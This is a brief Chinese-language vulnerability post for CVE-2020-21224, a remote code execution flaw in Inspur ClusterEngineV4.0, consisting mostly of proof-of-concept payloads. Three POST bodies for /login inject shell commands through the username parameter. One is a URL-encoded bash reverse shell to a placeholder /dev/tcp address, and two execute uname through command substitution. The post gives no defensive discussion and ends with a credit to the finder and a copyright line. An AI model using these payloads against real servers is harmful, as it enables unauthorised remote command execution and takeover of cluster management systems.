# CVE-2020-21224 浪潮 ClusterEngineV4.0 远程代码执行
影响版本:
– 不详
POC:
POST /login
1:
“`
op=login&username=1 2\’,\’1\’\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F0.0.0.0%2F0000%200%3E%261`
“`
2:
“`
op=login&username=1 2\’,\’1\’\); $(uname)
“`
3:
“`
op=login&username=1 2\’,\’1\’\); “`uname“`
“`
[@NS-Sp4ce](https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容